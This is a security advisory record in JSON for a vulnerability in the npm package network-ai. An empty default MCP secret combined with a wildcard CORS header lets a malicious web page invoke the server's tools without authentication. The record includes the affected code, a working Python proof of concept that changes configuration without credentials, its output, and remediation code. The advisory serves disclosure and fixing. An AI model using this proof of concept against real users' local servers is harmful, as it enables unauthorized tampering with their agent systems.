{"id":"GHSA-j3vx-cx2r-pvg8","summary":"Network-AI: Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret","details":"# Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret\n\n| Field            | Value |\n| ---------------- | ----- |\n| Repository       | Jovancoding/Network-AI |\n| Affected version | v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac) |\n\n## Summary\n\nThe MCP SSE server defaults to an empty secret (`process.env['NETWORK_AI_MCP_SECRET'] ?? ''` at `bin/mcp-server.ts:89`), which causes `_isAuthorized` (`lib/mcp-transport-sse.ts:254`) to return `true` unconditionally for every request — no `Authorization` header is required. Simultaneously, `_handleRequest` sets `Access-Control-Allow-Origin: *` (`lib/mcp-transport-sse.ts:272`) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including `config_set`, `agent_spawn`, and `blackboard_write` — against a default-configured localhost server.\n\n## Affected Code\n\n`bin/mcp-server.ts:89` — default secret resolves to empty string, enabling open access\n\n```typescript\n    secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',\n```\n\n`lib/mcp-transport-sse.ts:254` — auth guard short-circuits to `true` when secret is falsy\n\n```typescript\n  private _isAuthorized(req: http.IncomingMessage): boolean {\n    if (!this._opts.secret) return true;\n    const authHeader = req.headers['authorization'];\n    if (typeof authHeader !== 'string') return false;\n    const parts = authHeader.split(' ');\n    return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;\n  }\n```\n\n`lib/mcp-transport-sse.ts:272` — wildcard CORS header applied unconditionally before any auth check\n\n```typescript\n  private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {\n    // CORS — allow any MCP client to connect\n    res.setHeader('Access-Control-Allow-Origin', '*');\n    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');\n    res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');\n```\n\n`lib/mcp-transport-sse.ts:367-368` — authenticated path dispatches parsed JSON-RPC frame directly to `handleRPC` with no further caller validation\n\n```typescript\n        const rpc = JSON.parse(body) as McpJsonRpcRequest;\n        const response = await this._bridge.handleRPC(rpc);\n```\n\nAny cross-origin browser request reaches `handleRPC` because `_isAuthorized` returns `true` (empty secret) and the `Access-Control-Allow-Origin: *` header lets the browser expose the response to the calling script.\n\n## Proof of Concept\n\n**Environment**\n- Network-AI v5.4.4 (latest)\n- Docker container bound to `127.0.0.1:3001`\n- Python 3 + `requests`\n\n**poc.py**\n```python\nimport sys\nimport requests\n\nBASE = \"http://127.0.0.1:3001\"\n\n# Step 1: Verify CORS wildcard (simulating cross-origin preflight)\npreflight = requests.options(\n    f\"{BASE}/mcp\",\n    headers={\n        \"Origin\": \"http://evil.example.com\",\n        \"Access-Control-Request-Method\": \"POST\",\n        \"Access-Control-Request-Headers\": \"Content-Type\",\n    },\n)\nacao = preflight.headers.get(\"Access-Control-Allow-Origin\", \"\")\nprint(f\"[*] OPTIONS /mcp -\u003e {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}\")\nif acao != \"*\":\n    print(f\"RESULT: FAIL — expected ACAO='*', got {acao!r}\")\n    sys.exit(1)\n\n# Step 2: Invoke config_set with NO Authorization header from cross-origin\nrpc_payload = {\n    \"jsonrpc\": \"2.0\",\n    \"id\": 1,\n    \"method\": \"tools/call\",\n    \"params\": {\n        \"name\": \"config_set\",\n        \"arguments\": {\n            \"key\": \"maxParallelAgents\",\n            \"value\": \"999\"\n        }\n    }\n}\nresp = requests.post(\n    f\"{BASE}/mcp\",\n    json=rpc_payload,\n    headers={\n        \"Content-Type\": \"application/json\",\n        \"Origin\": \"http://evil.example.com\",\n        # No Authorization header — exploiting empty-secret bypass\n    },\n)\nprint(f\"[*] POST /mcp (no auth, cross-origin) -\u003e {resp.status_code}\")\nprint(f\"[*] Response body: {resp.text[:800]}\")\nresp_acao = resp.headers.get(\"Access-Control-Allow-Origin\", \"\")\nprint(f\"[*] Response Access-Control-Allow-Origin: {resp_acao!r}\")\nif resp.status_code != 200:\n    print(f\"RESULT: FAIL — expected 200, got {resp.status_code}\")\n    sys.exit(1)\n\nbody = resp.json()\nresult_content = body.get(\"result\", {})\nis_error = result_content.get(\"isError\", True)\nif is_error:\n    print(f\"RESULT: FAIL — tool returned isError=true: {result_content}\")\n    sys.exit(1)\n\n# Step 3: Confirm CORS header on actual response (browser can read it)\nif resp_acao != \"*\":\n    print(f\"RESULT: FAIL — response ACAO not '*', browser would block read: {resp_acao!r}\")\n    sys.exit(1)\n\nprint(f\"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)\")\n```\n\n**Output**\n```\n[*] OPTIONS /mcp -\u003e 204, Access-Control-Allow-Origin: '*'\n[*] POST /mcp (no auth, cross-origin) -\u003e 200\n[*] Response body: {\"jsonrpc\":\"2.0\",\"id\":1,\"result\":{\"content\":[{\"type\":\"text\",\"text\":\"{\\\"ok\\\":true,\\\"tool\\\":\\\"config_set\\\",\\\"data\\\":{\\\"key\\\":\\\"maxParallelAgents\\\",\\\"previous\\\":null,\\\"current\\\":999,\\\"applied\\\":true}}\"}],\"isError\":false}}\n[*] Response Access-Control-Allow-Origin: '*'\nRESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)\n```\n\n**Verified conditions**\n1. `OPTIONS /mcp` → 204, `Access-Control-Allow-Origin: *` — browser preflight accepted by server\n2. `POST /mcp` (no Authorization header) → 200, `isError: false` — `config_set` executed without credentials\n3. Response `Access-Control-Allow-Origin: *` — response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page\n\n## Impact\n\nAny web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (`config_set`); the same vector applies to `agent_spawn` (spawning arbitrary agents), `blackboard_write` / `blackboard_delete` (corrupting shared agent state), and `token_create` / `token_revoke` (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).\n\n## Remediation\n\n1. **Require a non-empty secret at startup**: in `bin/mcp-server.ts`, reject launch when `args.secret` is empty and `--stdio` is not set:\n   ```typescript\n   if (!args.secret && !args.stdio) {\n     console.error('ERROR: --secret \u003ctoken\u003e or NETWORK_AI_MCP_SECRET must be set for SSE mode.');\n     process.exit(1);\n   }\n   ```\n2. **Restrict CORS to localhost origins only**: in `lib/mcp-transport-sse.ts:_handleRequest`, replace the wildcard with an allowlist:\n   ```typescript\n   const origin = req.headers['origin'] ?? '';\n   const allowed = /^https?:\\/\\/(localhost|127\\.0\\.0\\.1)(:\\d+)?$/.test(origin);\n   res.setHeader('Access-Control-Allow-Origin', allowed ? origin : '');\n   res.setHeader('Vary', 'Origin');\n   ```\n3. **Move CORS headers after the auth check** so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (`/sse`) if cross-origin streaming is needed and not on `/mcp`.","aliases":["CVE-2026-46701"],"modified":"2026-07-08T08:29:24.200115859Z","published":"2026-05-21T22:39:59Z","related":["CVE-2026-48814"],"database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-05-21T22:39:59Z","nvd_published_at":null,"cwe_ids":["CWE-346"]},"references":[{"type":"WEB","url":"https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-j3vx-cx2r-pvg8"},{"type":"PACKAGE","url":"https://github.com/Jovancoding/Network-AI"}],"affected":[{"package":{"name":"network-ai","ecosystem":"npm","purl":"pkg:npm/network-ai"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"5.4.5"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-j3vx-cx2r-pvg8/GHSA-j3vx-cx2r-pvg8.json","last_known_affected_version_range":"\u003c= 5.4.4"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L"}]}